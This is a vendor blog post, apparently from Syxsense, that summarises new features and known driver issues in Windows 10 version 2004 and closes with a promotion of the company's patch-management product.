In previous versions of Windows 10, there’s a recovery option to ‘Reset this PC’ to perform a local reinstall, in the event that corruption occurs. Introduced in Windows 10 2004, this option now allows for not just local recovery, but also with ‘Cloud download’ where the files can instead be delivered from Microsoft’s servers directly (as long as the device has an adequate internet connection). Mac users have enjoyed this for quite some time and now Microsoft has finally stepped-up.

Security Options

Windows Hello has been used for some time to allow users to log in with biometrics or passwordless methods, like fingerprint, face scan, or PIN code. With Windows 2004, these options are now supported even if the device is booted-up in Safe Mode. This is most likely added because now Windows Hello passwordless authentication can used entirely without passwords (while logging-in with a Microsoft account). Another security improvement with 2004, Microsoft has expanded its FIDO2 security key support to “include hybrid Azure Active Directory (Azure AD)-joined devices, enabling even more customers to take an important step in their journey towards passwordless environments.”

Anyone running certain models of AMD processers will also be happy to know that 2004 includes its new Secured-core technology. Lastly, there’s a new setting that allows apps to start back up when a user signs in/out. It supports registered desktop apps, but they will start in a suspended state minimized to the taskbar to save resources. This is located in Sign-in options and is disabled by default.

The Rest of the Features

Notepad has been with Windows since nearly the beginning and finally it has received some new features. This includes line numbers when using word-wrap, new Find experience when using word-wrap, notification when making unsaved changes, text zoom, and new shortcuts.

Since Windows 10 started with Feature Updates, areas of the operating system ported over from Windows 7 have slowly been phased out. This is apparent with every new release increasing the amount of features in Settings, and deprecating the old items. This version finally allows the Network Status page to be more comparable to Control Panel. The new Wifi 6 and WPA3 are now supported in 2004, preventing such attacks as DragonBlood and KRACK.

Just like Windows has handled it with Microsoft Office apps for years, there’s the new ability to automatically restore open UWP (Universal Windows Platform) apps, such as Calendar and Mail, after a reboot. There’s also an improved tablet experience for convertible PCs.

And for years, gamers and administrators alike have begged for the Task Manager Performance tab to support graphics card performance options. Windows now includes GPU performance metrics, just like other major components. It should be noted that although GPU performance is now monitored, thermal metrics are still not included.

Some Driver Issues

It should also be noted that the initial release of Windows 10 2004 didn’t come without a few hiccups and this isn’t anything new (Windows 10 1809, anybody?). There have been reports of bugs in various drivers including peripherals, accessories like Bluetooth, audio as well as graphics and display issues. Fortunately for many, Microsoft already caught a number of these with Windows Insiders testing and has enabled a number of blocks for devices that may have these unsupported drivers.

For example, certain audio drivers were highlighted early: “To safeguard your update experience, we have applied a compatibility hold on Windows 10 devices with affected Conexant or Synaptics audio drivers installed from being offered Windows 10, version 2004 or Windows Server, version 2004 until the driver has been updated,” Microsoft stated. There are also outstanding issues with Realtek Bluetooth drivers, Intel integrated GPUs, Thunderbolt, and older Nvidia display adapters. For administrators, it’s always recommended to test the Feature Update first in an environment that’s representative of the production environment to catch any potential issues.

Organizations, as well as consumers, that run Windows 10 version 2004 will have full update support for 18 months (support until December 14, 2021).

How Syxsense Can Help

Overall, trusting Windows Server Update Services (WSUS) or other third-party patching solutions may not bring these devices to a supported version successfully. Leveraging a cloud-based solution to bring older Windows 10 devices up-to-date ensures success and standardization, whether devices are inside or outside the network.

Syxsense Manage includes the ability to migrate managed devices to any desired version of Windows 10 through the use of a Feature Update task. Simply prepare end-user installation delay and reboot options, choose the devices to target, and select a time for the upgrade that works best for these target devices. A phased deployment approach is also recommended by the industry and is always easily done with Syxsense Manage.

Experience the Power of Syxsense

Syxsense has created innovative and intuitive technology that sees and knows everything. Manage and secure your environment with a simple and powerful solution.

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo